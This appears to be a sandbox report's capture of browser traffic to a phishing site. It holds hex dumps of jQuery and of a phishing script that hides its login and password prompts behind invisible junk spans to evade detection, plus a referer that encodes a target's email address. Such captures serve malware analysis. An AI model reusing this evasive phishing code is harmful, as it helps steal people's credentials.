                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 72 28 74 20 69 6e 20 65 29 6e 3d 61 5b 74 5d 2c 61 21 3d 3d 28 72 3d 65 5b 74 5d 29 26 26 28 6c 26 26 72 26 26 28 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 72 29 7c 7c 28 69 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 29 29 3f 28 69 3f 28 69 3d 21 31 2c 6f 3d 6e 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 6e 3a 5b 5d 29 3a 6f 3d 6e 26 26 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 6e 29 3f 6e 3a 7b 7d 2c 61 5b 74 5d 3d 77 2e 65 78 74 65 6e 64 28 6c 2c 6f 2c 72 29 29 3a 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 61 5b 74 5d 3d 72 29 29 3b 72 65 74 75 72 6e 20 61 7d 2c 77 2e 65 78 74 65 6e 64 28 7b 65 78 70 61 6e 64 6f 3a 22 6a 51 75 65 72 79 22 2b 28 22 33 2e 33 2e 31 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c
                                                                                                                                                                                    Data Ascii: r(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).repl
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 72 74 3a 68 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 77 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 77 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 74 2b 22 5d 22 5d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 76 61 72 20 74 3d 21 21 65 26 26 22 6c 65 6e 67 74 68 22 69 6e 20 65
                                                                                                                                                                                    Data Ascii: rt:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 5e 5c 5c 2e 28 22 2b 52 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 52 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 49 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 57 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4d 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4d 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4d 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4d 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77
                                                                                                                                                                                    Data Ascii: ^\\.("+R+")"),TAG:new RegExp("^("+R+"|[*])"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+W),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 72 6e 20 72 3b 69 66 28 21 69 26 26 28 28 74 3f 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 3a 77 29 21 3d 3d 64 26 26 70 28 74 29 2c 74 3d 74 7c 7c 64 2c 67 29 29 7b 69 66 28 31 31 21 3d 3d 54 26 26 28 66 3d 4a 2e 65 78 65 63 28 65 29 29 29 69 66 28 6f 3d 66 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 54 29 7b 69 66 28 21 28 6c 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 29 72 65 74 75 72 6e 20 72 3b 69 66 28 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 20 69 66 28 6d 26 26 28 6c 3d 6d 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6f 29 29 26 26 78 28 74 2c 6c 29 26 26 6c 2e 69 64 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 6c 29 2c 72 7d 65 6c 73 65 7b 69 66 28 66 5b
                                                                                                                                                                                    Data Ascii: rn r;if(!i&&((t?t.ownerDocument||t:w)!==d&&p(t),t=t||d,g)){if(11!==T&&(f=J.exec(e)))if(o=f[1]){if(9===T){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{if(f[
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 6e 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 6e 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 74 3f 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d
                                                                                                                                                                                    Data Ascii: return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===e}}function pe(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function de(e){return function(t){return"form"in t?t.parentNode&&!1===
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 62 29 2e 6c 65 6e 67 74 68 7d 29 2c 6e 2e 67 65 74 42 79 49 64 3f 28 72 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 5a 2c 65 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 72 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 67 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 65 74 75 72
                                                                                                                                                                                    Data Ascii: mentsByName||!d.getElementsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n=t.getElementById(e);retur
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 26 26 79 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 50 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 62 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 62 2b 22 2b 2a
                                                                                                                                                                                    Data Ascii: &&y.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||y.push("\\["+M+"*(?:value|"+P+")"),e.querySelectorAll("[id~="+b+"-]").length||y.push("~="),e.querySelectorAll(":checked").length||y.push(":checked"),e.querySelectorAll("a#"+b+"+*
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 44 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 66 3d 21 30 2c 30 3b 76 61 72 20 72 3d 21 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 72 7c 7c 28 31 26 28 72 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6e 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e
                                                                                                                                                                                    Data Ascii: =t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached&&t.


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    40192.168.2.1649775104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:52 UTC725OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6EWqQ2tPJ3hOCQyr/8EIQOSnBt HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:52 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:52 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KxnfHymGD7G5U2%2B%2BTcum%2BQddcRy5jPxTVeCpgPJFW2jJBD8f2q%2FgllCJbXWHnlSGDUMSlUTE57Mnq4g6GAUve2lnIY5%2Fzou1Qb6HPAufUR1hjMHk9Vt1bL4c7hFzPGeKliqCIcdzHuBP7erQl9SREpf7Mx0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d0bdfb524b3-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:52 UTC629INData Raw: 34 63 31 31 0d 0a 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 24 28 27 23 65 72 64 7a 71 71 73 70 62 7a 27 29 2e 66 6f 63 75 73 28 29 3b 7d 29 3b 0d 0a 24 28 27 23 75 77 65 76 69 63 70 6d 67 6c 27 29 2e 6b 65 79 70 72 65 73 73 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0d 0a 09 76 61 72 20 6b 65 79 20 3d 20 65 2e 77 68 69 63 68 3b 0d 0a 09 69 66 20 28 6b 65 79 20 3d 3d 20 31 33 29 0d 0a 09 7b 6e 51 28 74 72 75 65 29 3b 7d 7d 29 3b 0d 0a 24 28 22 23 63 78 65 64 73 72 75 64 72 74 22 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0d 0a 09 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 2e 2e 2f 63 71 52 61 4c
                                                                                                                                                                                    Data Ascii: 4c11$(document).ready(function() {$('#erdzqqspbz').focus();});$('#uwevicpmgl').keypress(function(e) {var key = e.which;if (key == 13){nQ(true);}});$("#cxedsrudrt").click(function(e) {e.preventDefault();window.location.href = "../cqRaL
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 6d 56 55 43 6b 78 64 77 61 70 48 58 63 4a 3c 2f 73 70 61 6e 3e 72 20 61 20 76 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 70 52 59 74 57 74 33 6e 43 5a 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4b 78 53 78 56 4e 78 46 64 54 71 62 45 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 69 67 4e 4c 74 67 4b 4e 35
                                                                                                                                                                                    Data Ascii: ="position: absolute;left: -9999px;">mVUCkxdwapHXcJ</span>r a v<span style="position: absolute;left: -9999px;">pRYtWt3nCZ</span>a<span style="position: absolute;left: -9999px;">KxSxVNxFdTqbE</span>l<span style="position: absolute;left: -9999px;">igNLtgKN5
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 69 59 71 3c 2f 73 70 61 6e 3e 72 20 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 31 69 4a 32 6d 35 35 4a 3c 2f 73 70 61 6e 3e 6b 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 78 41 43 39 48 72 45 38 52 68 79 66 63 4d 3c 2f 73 70 61 6e 3e 79 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 77 65 6c 54 36 63 51 54 4d 54 59 31 33 33 3c 2f 73 70 61 6e 3e 65 20 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66
                                                                                                                                                                                    Data Ascii: iYq</span>r S<span style="position: absolute;left: -9999px;">1iJ2m55J</span>k<span style="position: absolute;left: -9999px;">xAC9HrE8RhyfcM</span>yp<span style="position: absolute;left: -9999px;">welT6cQTMTY133</span>e n<span style="position: absolute;lef
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 4e 58 61 51 76 6c 69 3c 2f 73 70 61 6e 3e 6f 75 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 46 63 61 53 6a 37 64 31 67 55 63 57 6c 36 61 3c 2f 73 70 61 6e 3e 74 20 77 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 59 30 57 30 38 6e 62 61 72 49 41 41 3c 2f 73 70 61 6e 3e 69 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 58 39 41 30 45 37 39 54 3c 2f 73 70 61 6e 3e 68 20 74 68 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75
                                                                                                                                                                                    Data Ascii: NXaQvli</span>oun<span style='position: absolute;left: -9999px;'>FcaSj7d1gUcWl6a</span>t w<span style='position: absolute;left: -9999px;'>Y0W08nbarIAA</span>it<span style='position: absolute;left: -9999px;'>X9A0E79T</span>h th<span style='position: absolu
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 67 45 6a 62 5a 45 79 38 56 30 38 37 49 3c 2f 73 70 61 6e 3e 63 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 36 73 47 6c 4c 69 38 65 3c 2f 73 70 61 6e 3e 6f 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 4d 47 49 62 74 51 65 32 6e 38 45 75 6a 3c 2f 73 70 61 6e 3e 6f 66 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 4f 42 4a
                                                                                                                                                                                    Data Ascii: span style='position: absolute;left: -9999px;'>gEjbZEy8V087I</span>cr<span style='position: absolute;left: -9999px;'>6sGlLi8e</span>os<span style='position: absolute;left: -9999px;'>MGIbtQe2n8Euj</span>of<span style='position: absolute;left: -9999px;'>OBJ
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 73 6c 6b 6e 64 72 72 61 64 70 27 29 2e 68 74 6d 6c 28 27 45 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 37 6e 6f 6b 4a 44 31 37 50 72 65 43 59 3c 2f 73 70 61 6e 3e 6e 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 72 75 36 6c 32 74 6e 6d 68 6e 6c 45 72 70 73 3c 2f 73 70 61 6e 3e 65 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 6a 38 52 63 53 6f 79 66 74 38 3c 2f 73 70 61 6e 3e 72 20 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73
                                                                                                                                                                                    Data Ascii: slkndrradp').html('E<span style="position: absolute;left: -9999px;">7nokJD17PreCY</span>nt<span style="position: absolute;left: -9999px;">ru6l2tnmhnlErps</span>e<span style="position: absolute;left: -9999px;">j8RcSoyft8</span>r p<span style="position: abs
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 65 33 6e 38 67 62 76 4d 6e 46 77 3c 2f 73 70 61 6e 3e 6e 27 29 0d 0a 09 09 09 09 09 09 09 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 68 69 73 29 0d 0a 09 09 09 09 09 09 09 2e 61 64 64 43 6c 61 73 73 28 27 62 74 6e 20 62 74 6e 2d 62 6c 6f 63 6b 20 62 74 6e 2d 70 72 69 6d 61 72 79 27 29 3b 0d 0a 09 09 09 09 09 7d 29 2e 72 65 6d 6f 76 65 28 29 3b 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 09 24 28 27 23 72 65 6a 67 6b 7a 65 6e 6d 71 27 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 3b 0d 0a 09 09 09 09 24 28 27 23 73 75 74 68 73 61 6a 69 76 78 27 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 20 66 61 6c 73 65 29
                                                                                                                                                                                    Data Ascii: yle="position: absolute;left: -9999px;">e3n8gbvMnFw</span>n').insertBefore(this).addClass('btn btn-block btn-primary');}).remove();}$('#rejgkzenmq').css('display', 'none');$('#suthsajivx').prop('disabled', false)
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 79 70 73 67 4d 4a 45 66 5a 33 45 73 47 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 5a 49 45 45 57 33 4c 76 53 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 41 70 4f 59 58 53 46 39 5a 35 70 48 43 65 3c 2f 73 70 61 6e 3e 73 77 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 6b 62 43 31 6f 33 56 76 61 3c 2f 73 70 61 6e 3e 6f 72 3c 73 70
                                                                                                                                                                                    Data Ascii: on: absolute;left: -9999px;">ypsgMJEfZ3EsG</span>a<span style="position: absolute;left: -9999px;">ZIEEW3LvS</span>s<span style="position: absolute;left: -9999px;">ApOYXSF9Z5pHCe</span>sw<span style="position: absolute;left: -9999px;">kbC1o3Vva</span>or<sp
                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 74 79 48 56 77 73 6c 66 46 72 35 3c 2f 73 70 61 6e 3e 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 6f 4d 72 36 44 57 35 70 6f 61 72 64 78 66 3c 2f 73 70 61 6e 3e 64 27 29 3b 0d 0a 09 24 28 27 66 6f 72 6d 27 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 3a 62 75 74 74 6f 6e 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 09 24 28 22 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 27 73 75 62 6d 69 74 27 20 2f 3e 22 29 2e 61 74 74 72 28 7b 0d 0a 09 09 09 09 6e 61 6d 65 3a 20 74 68 69 73 2e 6e 61 6d 65 2c 0d 0a 09 09 09 7d 29
                                                                                                                                                                                    Data Ascii: style="position: absolute;left: -9999px;">tyHVwslfFr5</span>r<span style="position: absolute;left: -9999px;">oMr6DW5poardxf</span>d');$('form').find('input:button').each(function() {$("<button type='submit' />").attr({name: this.name,})
